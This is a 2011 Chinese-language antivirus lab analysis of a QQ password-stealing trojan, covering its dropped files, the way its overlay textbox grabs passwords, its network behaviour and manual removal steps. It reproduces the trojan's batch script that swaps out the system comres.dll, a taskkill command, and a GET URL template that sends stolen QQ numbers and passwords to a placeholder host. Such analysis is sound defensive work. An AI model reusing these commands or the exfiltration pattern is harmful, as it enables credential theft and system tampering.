Trojan/Win32.QQpass.wsy[stealer]分析 出处:安天实验室 时间:2011年8月22日 病毒标签 病毒名称:Trojan/Win32.QQpass.wsy[stealer] 病毒类型:盗号木马 文件 MD5:119F88734602DF573780149C3DB4204A 公开范围: 完全公开 危害等级: 3 文件长度: 290,837 字节 感染系统: Windows 98以上版本 开发工具: Microsoft Visual C++ 5.0 加壳类型: 无 病毒描述 该病毒是一个盗号木马,图标伪装为画笔文件图标。运行后结束QQ进程,迫使用户重新登录QQ,从而达到窃取密码的目的。恶意程序创建一个文本框覆盖在QQ原输入框之上来获取QQ密码,并通过Hook腾讯QQ的窗口消息来对假冒文本框进行定位。将盗取的QQ账号与密码以Get方式发送到指定地址。 行为分析-本地行为 1.恶意程序运行后衍生以下文件: %QQ%\Bin\comres.dll (用作镜像劫持替代系统的comres.dll) %QQ%\Bin\JoachimPeiper.dat (数据文件) %windows%\JoachimPeiper.dat (对文件%QQ%\Bin\JoachimPeiper.dat的备份) %windows%\rxing.bat (对文件% QQ%\Bin\comres.dll的备份) %windows%\mssoft.bat (用于结束QQ进程的批处理文件) %HomeDrive%\nod816.bat (文件路径布置批处理文件) %HomeDrive%\stter.exe (主要功能文件,PE可执行文件) 2.%HomeDrive%\nod816.bat文件内容及功能。 Move %QQ%\bin\shengod.dat %QQ%\bin\comres.dll move d:\fdsf.bmp d:\fdsf.bmp move d:\fdsf.bmp d:\fdsf.bmp del %system32%\dllcache\comres.dll move %system32%\comres.dll %WINDOWS%\hexil.dll move %WINDOWS%\rxing.bat %system32%\comres.dll copy %WINDOWS%\hexil.dll %QQ%\bin\hexil.dll copy %WINDOWS%\hexil.dll d:\fdsf.bmp copy %WINDOWS%\hexil.dll d:\fdsf.bmp del %0 功能:主要是进行了文件路径的布置。 3.%windows%\mssoft.bat文件内容及功能。 taskkill /f /im qq.exe /t 功能:结束QQ进程。 4.恶意程序的进程操作 创建IE进程并将恶意代码写入其中,监听本机UDP:1488端口,IE进程通过以下参数创建。 "%Program Files%\Internet Explorer\iexplore.exe" SCODEF:3208 CREDAT:14337 5.恶意程序的盗取方式 将%HomeDrive%\stter.exe文件注入到QQ进程中执行,并创建钩子来监控QQ登录窗口。如果发现,则创建一个文本框覆盖在QQ原输入框之上,用以截获用户输入的用户名密码。然后尝试解析域名为www.xxx.com的主机地址,并将获得的用户名密码以GET方式发送到指定的地址。 行为分析-网络行为 协议:HTTP 端口:80 连接域名: www.xxx.com 描述:通过GET方式进行提交. http://www.xxx.com/qq080910/mail.asp?tomail=xxx@163.com&mailbody=%s----%s&QQNumber=%s&QQPassWord=%s 注:以上连接中的%s为恶意程序盗取的QQ用户名及密码的字符串形式。 注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。 %Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量 %Windir%\ WINDODWS所在目录 %DriveLetter%\ 逻辑驱动器根目录 %ProgramFiles%\ 系统程序默认安装目录 %HomeDrive% = C:\ 当前启动的系统的所在分区 %Documents and Settings%\ 当前用户文档根目录 清除方案 1、使用安天防线可彻底清除此病毒(推荐),请点击下载(http://www.antiyfx.com)。 2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。 推荐使用ATool管理工具,请点击下载(http://www.antiyfx.com/download/atool.zip)。 (1)结束QQ.exe进程。 (2)删除恶意程序衍生文件。 %QQ%\Bin\comres.dll %QQ%\Bin\JoachimPeiper.dat %windows%\JoachimPeiper.dat %windows%\rxing.bat %windows%\mssoft.bat %HomeDrive%\nod816.bat %HomeDrive%\stter.exe (3)下载原始comres.dll文件拷贝到以下目录,用以替换病毒文件: %system32%\dllcache\comres.dll (4)重新启动计算机。 转自安天实验室: http://www.antiy.com/cn/security/2011/r110822_001.htm